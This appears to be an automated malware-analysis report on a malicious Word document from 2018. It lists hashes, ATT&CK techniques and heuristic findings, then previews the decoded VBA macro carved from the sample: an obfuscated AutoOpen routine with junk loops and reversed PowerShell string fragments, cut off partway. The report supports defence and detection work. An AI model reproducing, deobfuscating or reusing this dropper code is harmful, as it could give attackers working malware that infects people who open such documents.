Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 06362e2fe491c943…

MALICIOUS

Office (OLE)

Size: 166.5 KB
Created: 2018-05-19 06:52:00
Authoring application: Microsoft Office Word
First seen: 2018-06-30
MD5: 84b4aac3f586303f283b806cc0b8de22
SHA-1: 8a8d16763797f4f3f9d97ec672582191d7ae2549
SHA-256: 06362e2fe491c9439a9169ee88b2c5f0988eb2f35ee329b648bf7b53794b4f48
Risk Score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing VBA macros. The heuristic rated critical is a Shell() call within the VBA code, and the presence of an AutoOpen macro indicates that the code runs automatically when the document is opened. This combination is commonly used to download and execute further malicious content.

Heuristics (5)

  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call present in the VBA code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro present
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  162720 bytes
SHA-256: a3029b90fd52697b1cb4ba240aba0a1394bac8618e787637f8370a6cbea922d6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "MjIrJEAvfpYopY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub knhzz(QQRTR)
For IaXiP = 76898 To 86553
      For wbZoYF = 92690 To FYaHz
         jUdIBY = ChrB(GkSzw)
      Next
      DMjCJ = 82501 * 24271
      IOtbt = ELssJG + qCAGm
Next
End Sub
Sub ZsrGo(jszYVR)
For kobGk = 65142 To 15037
      For LusZpr = 14656 To KfvWW
         KRHFBN = ChrB(FmXbtV)
      Next
      PwPZiY = 25764 * 95470
      hziYjp = ZuuzdJ + fjuNGH
Next
For wwWiw = 26582 To 30731
      For swZMS = 50231 To SoCQu
         jwYzFz = ChrB(skLHpd)
      Next
      CLujbc = 6018 * 4400
      XRqYZO = KpNXR + wirQfi
Next
For mSXoq = 6804 To 13257
      For TpRuiC = 606 To PYLiiB
         bGREN = ChrB(sKzYu)
      Next
      EuBhV = 13741 * 23142
      Awdmwz = crTAil + viZzt
Next
End Sub
Sub aiTVks(oNqpXS)
For QfciI = 30233 To 37643
      For TdYPY = 7116 To TIWNhQ
         cICDC = ChrB(OAddM)
      Next
      kPGuqd = 20456 * 20187
      qzUUr = uiTJku + CUcENL
Next
For SzvDw = 37054 To 67596
      For OfkXF = 22139 To LhjKRU
         KTbhq = ChrB(lRmQw)
      Next
      sqBRX = 46868 * 12629
      TnYNoi = JuUCu + zpbbPd
Next
End Sub
Sub Autoopen()
On Error Resume Next
For bztUY = 93289 To 36463
      For JQMmLn = 99122 To vOtHw
         WROEcs = ChrB(apIvk)
      Next
      VtEor = 30679 * 38178
      iIPis = RjMWW + wacFT
Next
fisRJWlMcEjPWd (ZvjbE + FwZHonrX + ahdiqa)
For rcbsI = 97621 To 41981
      For sjucmY = 20795 To vQwUX
         YRCEYH = ChrB(WnpmV)
      Next
      wWiUGw = 69860 * 63406
      owSSQ = iNrFdB + KpEaO
Next
End Sub
Sub WwEqR(OkMwsW)
For JMcEmF = 83828 To 71736
      For Zwjrds = 23270 To PjkMKP
         IAYCpW = ChrB(zjpsr)
      Next
      kRVWmi = 44489 * 12588
      ZQVYT = Lmbwzr + ljpvRH
Next
For wClBdI = 96481 To 21110
      For Zbsdz = 53555 To jRCln
         Ottqoj = ChrB(jrQPIN)
      Next
      iUuLi = 1556 * 47695
      XFOwJ = JdPWK + osHmTR
Next
For jhKcV = 70367 To 9888
      For LXrDmY = 23113 To ncqWP
         NBtzN = ChrB(mNHrQi)
      Next
      UMdsNE = 89381 * 95109
      XSXbc = TKduG + TIjYW
Next
End Sub
Sub rwPAm(jrJKk)
For SVaHia = 48848 To 73479
      For QtzOV = 44946 To ADtTqh
         wrXfP = ChrB(kLIaAc)
      Next
      iMiIzk = 32380 * 52659
      RmRlw = GRQlkS + QHuKqV
Next
End Sub

Attribute VB_Name = "kXNslAn"
Sub kUGQb(ZlOdws)
For rKPrS = 13830 To 92129
      For OotvW = 38799 To YYzwDh
         vfTrhq = ChrB(jjscz)
      Next
      NwBTtr = 3663 * 43248
      MVEZjM = iBoYKO + XbZFBi
Next
End Sub
Function FwZHonrX()
On Error Resume Next
For BSXaj = 51153 To 45662
      For DLfJPT = 97166 To IKJqCq
         aiwOdr = ChrB(mAoYL)
      Next
      jwzlR = 96039 * 97590
      tBzPZo = urrFK + zrhLuo
Next
For EmzXc = 48864 To 77983
      For dJrmcS = 82942 To oApXSG
         jocYt = ChrB(frzrta)
      Next
      VzCuU = 89204 * 33553
      jFUOH = zkqOs + ZOjABv
Next
jqovsNpGKI = VtoruX("I%e7HtesecAlpeRC- 69]rAHc['+',tesi9Ctes EcaLper- 93]rAHc[,tesJbetesEcaLper- 43]rAHc[,tesYgBtes  EcaLper-  )tes}tes+tes}{htes+tesctes+teWbiFX", 21583 + 6 - 21583, 21583 + 133 - 21583)
For wRuuj = 83736 To 76760
      For ozuDY = 78182 To AiIJl
         jGGcA = ChrB(dHPCtY)
      Next
      SroKkW = 37587 * 97559
      nwLUK = OArrJ + SLnRiP
Next
For tdzqlq = 93704 To 46193
      For EnXszJ = 11607 To aIvRJ
         dswwZ = ChrB(wLROPJ)
      Next
      FbYtC = 83383 * 1528
      smmVV = HKSTT + KUwnrX
Next
VsjWP = VtoruX("0fziRmohSP$ ( . |)63]RAhc[,'gQh' EcaLPErC-93]RAhc[,)611]RAhc[+101]RAhc[+511]RAhc[(  EcaLPErC-)'))63]rAHc[,)07]rAHc[+58]rAHc[+45]rAHc[(EcaLper-2'+'9]rAHc[,tesz", 20105 + 2 - 20105, 20105 + 152 - 20105)
For isWJcq = 79999 To 1103
      For BOsZJC = 71744 To LcEir
         wuwZJ = ChrB(ckBfBW)
      Next
      VdJif = 4919 * 26051
... (truncated)